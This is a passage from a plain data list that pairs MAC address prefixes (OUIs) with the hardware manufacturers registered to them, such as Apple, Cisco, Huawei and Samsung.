Zhou Gaoshengda Technology Co.,LTD BCF9F2 TEKO CC5D78 JTD Consulting 349F7B CANON INC. B47AF1 Hewlett Packard Enterprise B0A454 Tripwire Inc. ACEB51 Universal Electronics, Inc. C4B239 Cisco Systems, Inc D8AED0 Shanghai Engineering Science & Technology Co.,LTD CGNPC CC5289 SHENZHEN OPTFOCUS TECHNOLOGY.,LTD 58D50A Murata Manufacturing Co., Ltd. 748A28 HMD Global Oy 50C6AD Fiberhome Telecommunication Technologies Co.,LTD 0C8447 Fiberhome Telecommunication Technologies Co.,LTD 9C6B72 Realme Chongqing MobileTelecommunications Corp Ltd D03110 Ingenic Semiconductor Co.,Ltd A8E77D Texas Instruments DC543D ITEL MOBILE LIMITED 6C410E Cisco Systems, Inc 149138 Amazon Technologies Inc. 08CC27 Motorola Mobility LLC, a Lenovo Company 04D395 Motorola Mobility LLC, a Lenovo Company E09806 Espressif Inc. F4CFA2 Espressif Inc. 6C310E Cisco Systems, Inc 642CAC HUAWEI TECHNOLOGIES CO.,LTD E884C6 HUAWEI TECHNOLOGIES CO.,LTD 5CB4E2 Inspur Software Group Ltd. D42493 GW Technologies Co.,Ltd 2877F1 Apple, Inc. F0A35A Apple, Inc. 608373 Apple, Inc. 84AD8D Apple, Inc. 74428B Apple, Inc. F81E6F EBG compleo GmbH 14A32F Huawei Device Co., Ltd. 04D3B5 Huawei Device Co., Ltd. 00BB1C Huawei Device Co., Ltd. 88A303 Samsung Electronics Co.,Ltd FCDE90 Samsung Electronics Co.,Ltd 1854CF Samsung Electronics Co.,Ltd 3C510E Cisco Systems, Inc 80AC7C Sichuan AI-Link Technology Co., Ltd. DC4BFE Shenzhen Belon Technology CO.,LTD 80795D Infinix mobility limited F0A7B2 FUTABA CORPORATION 609B2D JMACS Japan Co., Ltd. C0E434 AzureWave Technology Inc. 6C710D Cisco Systems, Inc F875A4 LCFC(HeFei) Electronics Technology co., ltd 00D2B1 TPV Display Technology (Xiamen) Co.,Ltd. 506255 IEEE Registration Authority 10C65E Adapt-IP 8CDC02 zte corporation E01F88 Xiaomi Communications Co Ltd 803253 Intel Corporate 683943 ittim 5CE7A0 Nokia 1C4455 Sieb & Meyer AG 20311C vivo Mobile Communication Co., Ltd. B4E842 Hong Kong Bouffalo Lab Limited 7CA7B0 SHENZHEN BILIAN ELECTRONIC CO.,LTD 8031F0 Samsung Electronics Co.,Ltd 583526 DEEPLET TECHNOLOGY CORP 000084 SUPERNET 2852F9 Zhongxin Intelligent Times (Shenzhen) Co., Ltd. B8F853 Arcadyan Corporation E0D083 Samsung Electronics Co.,Ltd D80B9A Samsung Electronics Co.,Ltd D03D52 Ava Security Limited AC8D34 HUAWEI TECHNOLOGIES CO.,LTD 743C18 Taicang T&W Electronics 1088CE Fiberhome Telecommunication Technologies Co.,LTD 8C02FA COMMANDO Networks Limited 4C80BA Wuhan Tianyu Information Industry Co., Ltd. 34B5A3 CIG SHANGHAI CO LTD 6C1DEB u-blox AG 287FCF Intel Corporate 743170 Arcadyan Technology Corporation 246F8C Huawei Device Co., Ltd. 1C1386 Huawei Device Co., Ltd. BC2EF6 Huawei Device Co., Ltd. 4455C4 Huawei Device Co., Ltd. 50A132 Shenzhen MiaoMing Intelligent Technology Co.,Ltd 807871 ASKEY COMPUTER CORP 401175 IEEE Registration Authority 84A9EA Career Technologies USA E405F8 Bytedance 283334 Huawei Device Co., Ltd. 30A2C2 Huawei Device Co., Ltd. 848094 Meter, Inc. 10B3D5 Cisco Systems, Inc 705425 ARRIS Group, Inc. 5C0BCA Tunstall Nordic AB DCDFD6 zte corporation ACA88E SHARP Corporation 98415C Nintendo Co.,Ltd FCC233 ASUSTek COMPUTER INC. F47488 New H3C Technologies Co., Ltd F49C12 Structab AB 4C7A48 Nippon Seiki (Europe) B.V. 88517A HMD Global Oy ACB3B5 HUAWEI TECHNOLOGIES CO.,LTD A463A1 Inventus Power Eletronica do Brasil LTDA 3C9D56 HUAWEI TECHNOLOGIES CO.,LTD 70FD45 HUAWEI TECHNOLOGIES CO.,LTD 446747 HUAWEI TECHNOLOGIES CO.,LTD 884A70 Wacom Co.,Ltd. 84D15A TCT mobile ltd B8F653 Shenzhen Jingxun Software Telecommunication Technology Co.,Ltd 60AB14 LG Innotek BC62D2 Genexis International B.V. 6C9E7C Fiberhome Telecommunication Technologies Co.,LTD F08620 Arcadyan Corporation DCCC8D Integrated Device Technology (Malaysia) Sdn. Bhd. 083A88 Universal Global Scientific Industrial Co., Ltd. 08318B HUAWEI TECHNOLOGIES CO.,LTD F4B688 PLANTRONICS, INC. 000C86 Cisco Systems, Inc F83CBF BOTATO ELECTRONICS SDN BHD FC589A Cisco Systems, Inc 4CB1CD Ruckus Wireless 44D5F2 IEEE Registration Authority 0CDD24 Intel Corporate F05C77 Google, Inc. D44BB6 Zhejiang Tmall Technology Co., Ltd. 38184C Sony Home Entertainment&Sound Products Inc 347563 SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. 142E5E Sercomm Corporation. 0025CB Reiner SCT 44237C Beijing Xiaomi Mobile Software Co., Ltd 309435 vivo Mobile Communication Co., Ltd. 50EB71 Intel Corporate C064E4 Cisco Systems, Inc 6CD71F GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD F06865 Taicang T&W Electronics C4AC59 Murata Manufacturing Co., Ltd. 5816D7 ALPSALPINE CO,.LTD FCA47A IEEE Registration Authority F4B5BB CERAGON NETWORKS 507AC5 Apple, Inc. D82FE6 Zhejiang Tmall Technology Co., Ltd. 140F42 Nokia 006D61 Guangzhou V-SOLUTION Electronic Technology Co., Ltd. 8C4962 Roku, Inc 001D29 Doro AB ECA5DE ONYX WIFI Inc 4C6BE8 Apple, Inc. 8C861E Apple, Inc. 542B8D Apple, Inc. 54EF44 Lumi United Technology Co., Ltd 402B50 ARRIS Group, Inc. 001F47 MCS Logic Inc. 78CC2B SINEWY TECHNOLOGY CO., LTD B80756 Cisco Meraki D0C857 IEEE Registration Authority 38EFE3 INGENICO TERMINALS SAS 50D4F7 TP-LINK TECHNOLOGIES CO.,LTD. B45459 China Mobile (Hangzhou) Information Technology Co., Ltd. 000A17 NESTAR COMMUNICATIONS, INC D8AF81 AO E4FDA1 HUAWEI TECHNOLOGIES CO.,LTD E419C1 HUAWEI TECHNOLOGIES CO.,LTD B86685 Sagemcom Broadband SAS B452A9 Texas Instruments 381A52 Seiko Epson Corporation 5C879C Intel Corporate 24EE9A Intel Corporate 7460FA HUAWEI TECHNOLOGIES CO.,LTD C40683 HUAWEI TECHNOLOGIES CO.,LTD 94D00D HUAWEI TECHNOLOGIES CO.,LTD C48A5A JFCONTROL B49A95 Shenzhen Boomtech Industrial Corporation 000970 Vibration Research Corporation 14A2A0 Cisco Systems, Inc E4AB89 MitraStar Technology Corp. 1C20DB HUAWEI TECHNOLOGIES CO.,LTD D0C65B HUAWEI TECHNOLOGIES CO.,LTD 9078B2 Xiaomi Communications Co Ltd 78C313 China Mobile Group Device Co.,Ltd. 7434AE this is engineering Inc. B4CFE0 Sichuan tianyi kanghe communications co., LTD 6CF17E Zhejiang Uniview Technologies Co.,Ltd. 6095CE IEEE Registration Authority 8CE5C0 Samsung Electronics Co.,Ltd F08A76 Samsung Electronics Co.,Ltd ECAA25 Samsung Electronics Co.,Ltd 687D6B Samsung Electronics Co.,Ltd 485169 Samsung Electronics Co.,Ltd 74ADB7 China Mobile Group Device Co.,Ltd. BC7FA4 Xiaomi Communications Co Ltd AC83E9 Beijing Zile Technology Co., Ltd D8CA06 Titan DataCenters France FC492D Amazon Technologies Inc. 74EE2A SHENZHEN BILIAN ELECTRONIC CO.,LTD 8CFD18 HUAWEI TECHNOLOGIES CO.,LTD FCBCD1 HUAWEI TECHNOLOGIES CO.,LTD 080039 SPIDER SYSTEMS LIMITED 889E33 TCT mobile ltd D8F15B Espressif Inc. 90473C China Mobile Group Device Co.,Ltd. 7C21D8 Shenzhen Think Will Communication Technology co., LTD. FCEA50 Integrated Device Technology (Malaysia) Sdn. Bhd. 00E06B W&G SPECIAL PRODUCTS 488764 vivo Mobile Communication Co., Ltd. 5C1CB9 vivo Mobile Communication Co., Ltd. C0FD84 zte corporation 444B7E Fiberhome Telecommunication Technologies Co.,LTD E8D0FC Liteon Technology Corporation E8E8B7 Murata Manufacturing Co., Ltd. D4F057 Nintendo Co.,Ltd 103D3E China Mobile Group Device Co.,Ltd. 64CC22 Arcadyan Corporation 4C9157 Fujian LANDI Commercial Equipment Co.,Ltd 083A2F Guangzhou Juan Intelligent Tech Joint Stock Co.,Ltd 1C3A60 Ruckus Wireless 6009C3 u-blox AG DC8C37 Cisco Systems, Inc 6C8AEC Nantong Coship Electronics Co., Ltd. 84C2E4 Jiangsu Qinheng Co., Ltd. 5893D8 Texas Instruments 5051A9 Texas Instruments A4975C VTech Telecommunications Ltd. 1C2704 zte corporation 5078B3 zte corporation F0D4F7 varram system B02A1F Wingtech Group (HongKong)Limited DC680C Hewlett Packard Enterprise 3476C5 I-O DATA DEVICE,INC. 60D2DD Shenzhen Baitong Putian Technology Co.,Ltd. 308944 DEVA Broadcast Ltd. A8DB03 SAMSUNG ELECTRO-MECHANICS(THAILAND) 24DA33 HUAWEI TECHNOLOGIES CO.,LTD FCAB90 HUAWEI TECHNOLOGIES CO.,LTD 9C25BE Wildlife Acoustics, Inc. D039EA NetApp 788C77 LEXMARK INTERNATIONAL, INC. 3C0C7D Tiny Mesh AS 5C32C5 Teracom Ltd. F8DFE1 MyLight Systems 002615 Teracom Limited 9C8EDC Teracom Limited 000191 SYRED Data Systems 4846C1 FN-LINK TECHNOLOGY LIMITED 4889E7 Intel Corporate A0BD1D Zhejiang Dahua Technology Co., Ltd. ACE2D3 Hewlett Packard 00FD22 Cisco Systems, Inc 98FA9B LCFC(HeFei) Electronics Technology co., ltd 00B600 VOIM Co., Ltd. ACEE70 Fontem Ventures BV E0CC7A HUAWEI TECHNOLOGIES CO.,LTD F47960 HUAWEI TECHNOLOGIES CO.,LTD 145290 KNS Group LLC (YADRO Company) 6C23CB Wattty Corporation 60AB67 Xiaomi Communications Co Ltd AC710C China Mobile Group Device Co.,Ltd. 4418FD Apple, Inc. 005B94 Apple, Inc. E0897E Apple, Inc. 7C573C Aruba, a Hewlett Packard Enterprise Company ACD564 CHONGQING FUGUI ELECTRONICS CO.,LTD. 94D075 CIS Crypto 28B4FB Sprocomm Technologies CO.,LTD. C05336 Beijing National Railway Research & Design Institute of Signal & Communication Group Co..Ltd. 606ED0 SEAL AG 2CCCE6 Skyworth Digital Technology(Shenzhen) Co.,Ltd CC2C83 DarkMatter L.L.C DCED84 Haverford Systems Inc 644C36 Intel Corporate FC29F3 McPay Co.,LTD. F8AFDB Fiberhome Telecommunication Technologies Co.,LTD 04D7A5 New H3C Technologies Co., Ltd 885A06 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 5447D3 TSAT AS 40F9D5 Tecore Networks E44CC7 IEEE Registration Authority D4E880 Cisco Systems, Inc 2C01B5 Cisco Systems, Inc B4D0A9 China Mobile Group Device Co.,Ltd. E49F1E ARRIS Group, Inc. A8346A Samsung Electronics Co.,Ltd 3C20F6 Samsung Electronics Co.,Ltd 7C38AD Samsung Electronics Co.,Ltd 688B0F China Mobile IOT Company Limited 9849E1 Boeing Defence Australia 3CF011 Intel Corporate D49CDD AMPAK Technology,Inc. 50F722 Cisco Systems, Inc 9809CF OnePlus Technology (Shenzhen) Co., Ltd F82F6A ITEL MOBILE LIMITED C0D834 xvtec ltd 18DFB4 BOSUNG POWERTEC CO.,LTD. 4C4D66 Nanjing Jiahao Technology Co., Ltd. A4817A CIG SHANGHAI CO LTD CCEDDC MitraStar Technology Corp. A4E7E4 Connex GmbH B8EF8B SHENZHEN CANNICE TECHNOLOGY CO.,LTD B8186F ORIENTAL MOTOR CO., LTD. F89173 AEDLE SAS C84F86 Sophos Ltd 6429ED AO "PKK Milandr" B8DE5E LONGCHEER TELECOMMUNICATION LIMITED 20B780 Toshiba Visual Solutions Corporation Co.,Ltd 001A3F Intelbras 14D4FE ARRIS Group, Inc. F05C19 Aruba, a Hewlett Packard Enterprise Company 04BD88 Aruba, a Hewlett Packard Enterprise Company 9C1C12 Aruba, a Hewlett Packard Enterprise Company BCE67C Cambium Networks Limited 7C1E06 New H3C Technologies Co., Ltd F0B31E Universal Electronics, Inc. ECA9FA GUANGDONG GENIUS TECHNOLOGY CO., LTD. 0003A5 Medea Corporation 544741 XCHENG HOLDING CCF735 Amazon Technologies Inc. C8F742 HangZhou Gubei Electronics Technology Co.,Ltd 006FF2 MITSUMI ELECTRIC CO.,LTD. 78DD12 Arcadyan Corporation 002433 ALPSALPINE CO,.LTD 002306 ALPSALPINE CO,.LTD B4EC02 ALPSALPINE CO,.LTD 646038 Hirschmann Automation and Control GmbH 649D99 FS COM INC 00169D Cisco Systems, Inc 443C88 FICOSA MAROC INTERNATIONAL 841C70 zte corporation CCD39D IEEE Registration Authority 30DF8D SHENZHEN GONGJIN ELECTRONICS CO.,LT D4C93C Cisco Systems, Inc C4F839 Actia Automotive D425CC IEEE Registration Authority 8C6DC4 Megapixel VR 2C5D34 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 9C1463 Zhejiang Dahua Technology Co., Ltd. BC7536 ALPSALPINE CO,.LTD E0AE5E ALPSALPINE CO,.LTD E0750A ALPSALPINE CO,.LTD 0019C1 ALPSALPINE CO,.LTD 0016FE ALPSALPINE CO,.LTD 9C8D7C ALPSALPINE CO,.LTD 304A26 Shenzhen Trolink Technology CO, LTD D467D3 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD A41232 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 48E3C3 JENOPTIK Advanced Systems GmbH CC355A SecuGen Corporation 44FE3B Arcadyan Corporation D83AF5 Wideband Labs LLC 38D9A5 Mikotek Information Inc. 4C875D Bose Corporation B0E7DE Homa Technologies JSC D4B761 Sichuan AI-Link Technology Co., Ltd. 7C035E Xiaomi Communications Co Ltd 00D279 VINGROUP JOINT STOCK COMPANY 00004C NEC Corporation 8CCF8F ITC Systems 4C962D Fresh AB 484A30 George Robotics Limited 4861A3 Concern "Axion" JSC 80546A SHENZHEN GONGJIN ELECTRONICS CO.,LT B447F5 Earda Technologies co Ltd A89CA4 Furrion Limited E4D3AA FCNT LMITED F4C7C8 Kelvin Inc. 2875D8 FUJIAN STAR-NET COMMUNICATION CO.,LTD 90E202 Texas Instruments 4CE5AE Tianjin Beebox Intelligent Technology Co.,Ltd. 84A93E Hewlett Packard 349342 TTE Corporation B0C387 GOEFER, Inc. 086BD7 Silicon Laboratories 589EC6 Gigaset Communications GmbH 6458AD China Mobile IOT Company Limited A0A3B8 WISCLOUD 38F9D3 Apple, Inc. 1CF29A Google, Inc. 748A0D ARRIS Group, Inc. CC75E2 ARRIS Group, Inc. FC183C Apple, Inc. 64C753 Apple, Inc. 302478 Sagemcom Broadband SAS 4455B1 HUAWEI TECHNOLOGIES CO.,LTD 98F9C7 IEEE Registration Authority A40C66 Shenzhen Colorful Yugong Technology and Development Co., Ltd. 184BDF Caavo Inc FC7774 Intel Corporate 700B4F Cisco Systems, Inc E4388C Digital Products Limited B89A9A Xin Shi Jia Technology (Beijing) Co.,Ltd 8C7BF0 Xufeng Development Limited E0A509 Bitmain Technologies Inc 3C5CC4 Amazon Technologies Inc. D8A756 Sagemcom Broadband SAS D8D6F3 Integrated Device Technology (Malaysia) Sdn. Bhd. 787052 Welotec GmbH 2CCC44 Sony Interactive Entertainment Inc. F43909 Hewlett Packard 201F31 Inteno Broadband Technology AB 6C2CDC Skyworth Digital Technology(Shenzhen) Co.,Ltd 7835A0 Zurn Industries LLC A83FA1 IEEE Registration Authority F4DBE6 Cisco Systems, Inc 54833A Zyxel Communications Corporation 248498 Beijing Jiaoda Microunion Tech.Co.,Ltd. F47DEF Samsung Electronics Co.,Ltd 7C8BB5 Samsung Electronics Co.,Ltd D8A98B Texas Instruments 10B9F7 Niko-Servodan 14EFCF SCHREDER 3830F9 LG Electronics (Mobile Communications) 00F48D Liteon Technology Corporation 702ED9 Guangzhou Shiyuan Electronics Co., Ltd. C074AD Grandstream Networks, Inc. F095F1 Carl Zeiss AG 1801F1 Xiaomi Communications Co Ltd 6C9BC0 Chemoptics Inc. 10C22F China Entropy Co., Ltd. BC3865 JWCNETWORKS 04EB40 Cisco Systems, Inc 70192F HUAWEI TECHNOLOGIES CO.,LTD 18A7F1 Qingdao Haier Technology Co.,Ltd 90E17B Apple, Inc. D81C79 Apple, Inc. 58E6BA Apple, Inc. 94917F ASKEY COMPUTER CORP 9C0CDF GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 0050DA 3COM 000476 3COM 000475 3COM 7CD30A INVENTEC CORPORATION 001E33 INVENTEC CORPORATION FC1D84 Autobase C44F33 Espressif Inc. 546AD8 Elster Water Metering 00D096 3COM EUROPE LTD 002654 3COM 242124 Nokia 949B2C Extreme Networks, Inc. 44E4EE Wistron Neweb Corporation DC41E5 Shenzhen Zhixin Data Service Co., Ltd. C0847D AMPAK Technology, Inc. 00A5BF Cisco Systems, Inc C8BAE9 QDIS 0409A5 HFR, Inc. 4C1159 Vision Information & Communications C8544B Zyxel Communications Corporation 14C697 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 7C03AB Xiaomi Communications Co Ltd B42E99 GIGA-BYTE TECHNOLOGY CO.,LTD. 342CC4 Compal Broadband Networks, Inc. 00B5D0 Samsung Electronics Co.,Ltd 1496E5 Samsung Electronics Co.,Ltd D07FA0 Samsung Electronics Co.,Ltd 009093 EIZO Corporation F09FFC SHARP Corporation 14E9B2 Fiberhome Telecommunication Technologies Co.,LTD 3009F9 IEEE Registration Authority DC16B2 HUAWEI TECHNOLOGIES CO.,LTD 24FB65 HUAWEI TECHNOLOGIES CO.,LTD 0CB527 HUAWEI TECHNOLOGIES CO.,LTD 4422F1 S.FAC, INC 18AC9E ITEL MOBILE LIMITED EC84B4 CIG SHANGHAI CO LTD B4DDD0 Continental Automotive Hungary Kft 48F027 Chengdu newifi Co.,Ltd 50DCFC ECOCOM 700B01 Sagemcom Broadband SAS 5C2623 WaveLynx Technologies Corporation 303855 Nokia Corporation 00B670 Cisco Systems, Inc AC6417 Siemens AG 00BB60 Intel Corporate 7C6DA6 Superwave Group LLC 0006EC Harris Corporation 705AB6 COMPAL INFORMATION (KUNSHAN) CO., LTD. 201A06 COMPAL INFORMATION (KUNSHAN) CO., LTD. F8A963 COMPAL INFORMATION (KUNSHAN) CO., LTD. DC0EA1 COMPAL INFORMATION (KUNSHAN) CO., LTD. B870F4 COMPAL INFORMATION (KUNSHAN) CO., LTD. 1C3947 COMPAL INFORMATION (KUNSHAN) CO., LTD. 342792 FREEBOX SAS EC6F0B FADU, Inc. 3466EA VERTU INTERNATIONAL CORPORATION LIMITED 00049F Freescale Semiconductor 00D07B COMCAM INTERNATIONAL INC 78524A Optonic GmbH C46E7B SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. C048FB Shenzhen JingHanDa Electronics Co.Ltd 20E882 zte corporation 28385C FLEXTRONICS 0C1C57 Texas Instruments 806FB0 Texas Instruments 883F99 Siemens AG 347916 HUAWEI TECHNOLOGIES CO.,LTD D016B4 HUAWEI TECHNOLOGIES CO.,LTD 0CB5DE Alcatel Lucent 000B3B devolo AG 240588 Google, Inc. 388B59 Google, Inc. 880118 BLT Co A42618 Integrated Device Technology (Malaysia) Sdn. Bhd. 34E12D Intel Corporate 40A108 Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. 009D6B Murata Manufacturing Co., Ltd. F0F08F Nextek Solutions Pte Ltd 8CB0E9 Samsung Electronics.,LTD A46191 NamJunSa 84A24D Birds Eye Systems Private Limited 7C6B9C GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD EC58EA Ruckus Wireless 20A8B9 SIEMENS AG D45251 IBT Ingenieurbureau Broennimann Thun 0018B5 Magna Carta D87EB1 x.o.ware, inc. 0017B6 Aquantia Corporation 105917 Tonal 745933 Danal Entertainment D0EFC1 HUAWEI TECHNOLOGIES CO.,LTD 485702 HUAWEI TECHNOLOGIES CO.,LTD 9C713A HUAWEI TECHNOLOGIES CO.,LTD 2C97B1 HUAWEI TECHNOLOGIES CO.,LTD 24EC51 ADF Technologies Sdn Bhd 7089CC China Mobile Group Device Co.,Ltd. DCAF68 WEIFANG GOERTEK ELECTRONICS CO.,LTD 882D53 Baidu Online Network Technology (Beijing) Co., Ltd. 00D0B5 IPricot formerly DotCom CC7B61 NIKKISO CO., LTD. 2C5BE1 Centripetal Networks, Inc DCEFCA Murata Manufacturing Co., Ltd. 00BC60 Cisco Systems, Inc 0009DF Vestel Elektronik San ve Tic. A.S. 8CF228 MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. A4EA8E Extreme Networks, Inc. 644F42 JETTER CO., Ltd. 700F6A Cisco Systems, Inc 5061BF Cisco Systems, Inc 108EE0 Samsung Electronics Co.,Ltd FCA621 Samsung Electronics Co.,Ltd 00305E Abelko Innovation FC6BF0 TOPWELL INTERNATIONAL HOLDINDS LIMITED 001477 Trilliant 00079B Aurora Networks 54B203 PEGATRON CORPORATION 3868DD INVENTEC CORPORATION 3C6AA7 Intel Corporate A028ED HMD Global Oy AC5474 China Mobile IOT Company Limited 746BAB GUANGDONG ENOK COMMUNICATION CO., LTD 0CB6D2 D-Link International 7829ED ASKEY COMPUTER CORP B8B7F1 Wistron Neweb Corporation 8050F6 ITEL MOBILE LIMITED D0C5D3 AzureWave Technology Inc. 14169E Wingtech Group (HongKong)Limited 107BA4 Olive & Dove Co.,Ltd. 203956 HMD Global Oy 78AFE4 Comau S.p.A A8CAB9 SAMSUNG ELECTRO MECHANICS CO., LTD. F8C39E HUAWEI TECHNOLOGIES CO.,LTD 90A137 Beijing Splendidtel Communication Technology Co,. Ltd 80029C Gemtek Technology Co., Ltd. E8D099 Fiberhome Telecommunication Technologies Co.,LTD 8C1CDA IEEE Registration Authority BC325F Zhejiang Dahua Technology Co., Ltd. 000BB2 SMALLBIG TECHNOLOGY F4032F Reduxio Systems 7C41A2 Nokia 944A0C Sercomm Corporation. 000FA2 2xWireless 505BC2 Liteon Technology Corporation 6C21A2 AMPAK Technology, Inc. 9C2F73 Universal Tiancheng Technology (Beijing) Co., Ltd. D832E3 Xiaomi Communications Co Ltd 9487E0 Xiaomi Communications Co Ltd 38AF29 Zhejiang Dahua Technology Co., Ltd. 300AC5 Ruio telecommunication technologies Co., Limited 00E065 OPTICAL ACCESS INTERNATIONAL C88629 Shenzhen Duubee Intelligent Technologies Co.,LTD. CCC2E0 Raisecom Technology CO., LTD 883F4A Texas Instruments 1409DC HUAWEI TECHNOLOGIES CO.,LTD 38BAF8 Intel Corporate 0007A8 Haier Group Technologies Ltd 9814D2 Avonic 78F9B4 Nokia Solutions and Networks GmbH & Co. KG 2016B9 Intel Corporate 00165C Trackflow Ltd. D88A3B UNIT-EM EC5A86 Yulong Computer Telecommunication Scientific (Shenzhen) Co.,Ltd C4BAA3 Beijing Winicssec Technologies Co., Ltd. 9CFEA1 Fiberhome Telecommunication Technologies Co.,LTD 4466FC GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 50A009 Xiaomi Communications Co Ltd 88964E ARRIS Group, Inc. C0EEB5 Enice Network. 60DEF3 HUAWEI TECHNOLOGIES CO.,LTD D076E7 TP-LINK TECHNOLOGIES CO.,LTD. 9CA615 TP-LINK TECHNOLOGIES CO.,LTD. E44E76 CHAMPIONTECH ENTERPRISE (SHENZHEN) INC 004098 DRESSLER GMBH & CO. 949990 VTC Telecommunications F4BC97 Shenzhen Crave Communication Co., LTD 001DFA Fujian LANDI Commercial Equipment Co.,Ltd 28FEDE COMESTA, Inc. 641CAE Samsung Electronics Co.,Ltd F8E44E MCOT INC. 40CD7A Qingdao Hisense Communications Co.,Ltd. 144E34 Remote Solution DC4EF4 Shenzhen MTN Electronics CO., Ltd F08173 Amazon Technologies Inc. EC65CC Panasonic Automotive Systems Company of America 907910 Integrated Device Technology (Malaysia) Sdn. Bhd. 003DE8 LG Electronics (Mobile Communications) 68FEDA Fiberhome Telecommunication Technologies Co.,LTD 9CE65E Apple, Inc. C49880 Apple, Inc. E0338E Apple, Inc. 08F69C Apple, Inc. 04FA83 Qingdao Haier Technology Co.,Ltd 50A67F Apple, Inc. D461DA Apple, Inc. F01898 Apple, Inc. 881908 Apple, Inc. 5C0947 Apple, Inc. 14205E Apple, Inc. B841A4 Apple, Inc. 00508B Hewlett Packard 3403DE Texas Instruments 34D712 Smartisan Digital Co., Ltd A06610 FUJITSU LIMITED 146B9C SHENZHEN BILIAN ELECTRONIC CO.,LTD D4F786 Fiberhome Telecommunication Technologies Co.,LTD 94B86D Intel Corporate 240A63 ARRIS Group, Inc. F88B37 ARRIS Group, Inc. 20677C Hewlett Packard Enterprise 8817A3 Integrated Device Technology (Malaysia) Sdn. Bhd. 88A9A7 IEEE Registration Authority EC8914 HUAWEI TECHNOLOGIES CO.,LTD B89436 HUAWEI TECHNOLOGIES CO.,LTD 948DEF Oetiker Schweiz AG 44FFBA zte corporation 2CD974 Hui Zhou Gaoshengda Technology Co.,LTD E0E62E TCT mobile ltd 6084BD BUFFALO.INC 347ECA NEXTWILL DCE533 IEEE Registration Authority D8445C DEV Tecnologia Ind Com Man Eq LTDA B42EF8 Eline Technology co.Ltd A4D4B2 Shenzhen MeiG Smart Technology Co.,Ltd 8CF773 Nokia 24181D SAMSUNG ELECTRO-MECHANICS(THAILAND) C4FFBC IEEE Registration Authority DCDD24 Energica Motor Company SpA 641CB0 Samsung Electronics Co.,Ltd 903A72 Ruckus Wireless 8C5973 Zyxel Communications Corporation 509551 ARRIS Group, Inc. 804126 HUAWEI TECHNOLOGIES CO.,LTD ACF970 HUAWEI TECHNOLOGIES CO.,LTD 58D759 HUAWEI TECHNOLOGIES CO.,LTD F89066 Nain Inc. 7006AC Eastcompeace Technology Co., Ltd 501479 iRobot Corporation E42D7B China Mobile IOT Company Limited C464E3 Texas Instruments CC3B58 Curiouser Products Inc 387862 Sony Corporation 4CEFC0 Amazon Technologies Inc. 7C3953 zte corporation 38E1AA zte corporation 48C796 Samsung Electronics Co.,Ltd F4C248 Samsung Electronics Co.,Ltd F47190 Samsung Electronics Co.,Ltd 2802D8 Samsung Electronics Co.,Ltd 283B82 D-Link International 94290C Shenyang wisdom Foundation Technology Development Co., Ltd. 9C32CE CANON INC. 802BF9 Hon Hai Precision Ind. Co.,Ltd. 54B802 Samsung Electronics Co.,Ltd 20E09C Nokia 2CFDA1 ASUSTek COMPUTER INC. 3807D4 Zeppelin Systems GmbH 04197F Grasphere Japan 14444A Apollo Seiko Ltd. 580454 ICOMM HK LIMITED C477AF Advanced Digital Broadcast SA 6C54CD LAMPEX ELECTRONICS LIMITED 000889 Dish Technologies Corp 04C9D9 Dish Technologies Corp 7055F8 Cerebras Systems Inc 34415D Intel Corporate 005091 NETACCESS, INC. B85001 Extreme Networks, Inc. F0B5B7 Disruptive Technologies Research AS B4DEDF zte corporation D4909C Apple, Inc. E4E0A6 Apple, Inc. 5C0038 Viasat Group S.p.A. EC8193 Logitech, Inc 6CDD30 Cisco Systems, Inc 6C4E86 Third Millennium Systems Ltd. 5C86C1 DONGGUAN SOLUM ELECTRONICS CO.,LTD 38437D Compal Broadband Networks, Inc. 506F98 Sehaj Synergy Technologies Private Limited 3C2C99 Edgecore Networks Corporation 10CEA9 Texas Instruments 805E0C YEALINK(XIAMEN) NETWORK TECHNOLOGY CO.,LTD. 6C49C1 o2ones Co., Ltd. 88D039 Tonly Technology Co. Ltd 70EEA3 Eoptolink Technology Inc. Ltd, 7047E9 vivo Mobile Communication Co., Ltd. 5C521E Nintendo Co.,Ltd 683E02 SIEMENS AG, Digital Factory, Motion Control System 000261 Tilgin AB 0014C3 Seagate Technology 0004CF Seagate Technology 002037 Seagate Technology 4CAE1C SaiNXT Technologies LLP 142882 MIDICOM ELECTRONICS CO.LTD 30E48E Vodafone UK 5C81A7 Network Devices Pty Ltd 5C0C0E Guizhou Huaxintong Semiconductor Technology Co Ltd 00E091 LG Electronics 503CEA GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 001730 Automation Electronics 449160 Murata Manufacturing Co., Ltd. B4F1DA LG Electronics (Mobile Communications) C863F1 Sony Interactive Entertainment Inc. 0019C2 Equustek Solutions, Inc. 80000B Intel Corporate 6C05D5 Ethertronics Inc F8B7E2 Cisco Systems, Inc F82055 Green Information System 74E19A Fiberhome Telecommunication Technologies Co.,LTD 78DDD9 Guangzhou Shiyuan Electronics Co., Ltd. B0FC36 CyberTAN Technology Inc. 001DF4 Magellan Technology Pty Limited FC9DD8 Beijing TongTongYiLian Science and Technology Ltd. DC2834 HAKKO Corporation 84509A Easy Soft TV Co., Ltd 5C7776 TCT mobile ltd 70E56E Texas Instruments 547DCD Texas Instruments 00AECD Pensando Systems DCE1AD Shenzhen Wintop Photoelectric Technology Co., Ltd 948854 Texas Instruments 001D0D Sony Interactive Entertainment Inc. 001CAE WiChorus, Inc. 44CD0E FLEXTRONICS MANUFACTURING(ZHUHAI)CO.,LTD. E8825B ARRIS Group, Inc. ECB0E1 Ciena Corporation 18CC88 Hitachi Johnson Controls Air 7CDD76 Suzhou Hanming Technologies Co., Ltd. 246880 Braveridge.co.,ltd. E8DF70 AVM Audiovisuelles Marketing und Computersysteme GmbH D05995 Fiberhome Telecommunication Technologies Co.,LTD A8D3C8 Topcon Electronics GmbH & Co. KG 2C431A Shenzhen YOUHUA Technology Co., Ltd 70708B Cisco Systems, Inc 